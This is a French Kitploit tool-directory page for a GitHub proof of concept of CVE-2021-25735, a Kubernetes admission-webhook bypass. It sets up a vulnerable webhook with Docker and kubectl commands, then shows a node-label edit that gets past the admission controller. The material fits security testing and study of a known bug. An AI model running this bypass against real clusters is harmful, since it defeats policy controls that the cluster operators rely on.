Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-25735 — Exploit pour CVE-2021-25735 démontrant le contournement du webhook d'admission validant Kubernetes via la manipulation d'étiquettes de nœud, avec conteneur Docker déployable et scripts d'enregistrement de webhook. | Kitploit
Outils/GitHubGitHub/darryk10/cve-2021-25735
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionSécurité Cloud
GitHubdarryk10/cve-2021-25735

CVE-2021-25735

Exploit pour CVE-2021-25735 démontrant le contournement du webhook d'admission validant Kubernetes via la manipulation d'étiquettes de nœud, avec conteneur Docker déployable et scripts d'enregistrement de webhook.

Voir le dépôt
1752il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-25735

Exploitation de CVE-2021-25735 : contournement du webhook de validation d'admission Kubernetes

Configurer l'environnement vulnérable

Commençons par exécuter le script gencerts.sh pour générer les certificats et clés TLS.
bash gencerts.sh

Pour déployer le contrôleur d'admission, vous devez construire l'image du conteneur Docker localement, la taguer et la pousser vers votre Dockerhub à l'aide des commandes ci-dessous.
docker login
docker build -t validationwebhook:1.0 .
docker tag validationwebhook:1.0 darryk/dev:1.0
docker push darryk/dev:1.0

Vous pouvez maintenant déployer l'image créée avec l'application Node.js dans votre cluster K8s. Le fichier webhook-deploy.yaml déploiera tous les composants nécessaires dans votre cluster.
kubectl apply -f webhook-deploy.yaml

Enregistrons maintenant notre webhook auprès du serveur API Kubernetes. Pour cela, nous créons un encodage Base64 du fichier ca.crt créé précédemment et remplaçons CA_BUNDLE dans webhook-registration.yaml.
cat ca.crt | base64

Enfin, nous enregistrerons le webhook auprès du serveur API Kubernetes.
kubectl apply -f webhook-registration.yaml

Exploitation de CVE-2021-25735

Nous modifions l'étiquette du nœud à l'aide de edit nodes et nous ajoutons une nouvelle étiquette.
kubectl edit nodes ip-172-20-61-82.ec2.internal

root@kitploit:~
  labels:  
    test: test  
    changeAllowed: "false"

Étant donné que ChangeAllowed est défini sur "false", nous obtenons l'erreur suivante :

error: nodes "ip-172-20-46-130.ec2.internal" could not be patched: admission webhook "validationwebhook.validationwebhook.svc" denied the request: Validation failed You can run kubectl replace -f /tmp/kubectl-edit-irc64.yaml to try this update again.

Si nous réessayons de modifier le nœud en effectuant le changement suivant :

root@kitploit:~
  labels:  
    test: test  
    changeAllowed: "true"

Dans ce cas, l'action d'édition a été acceptée en contournant le contrôleur d'admission.

Télécharger l’outil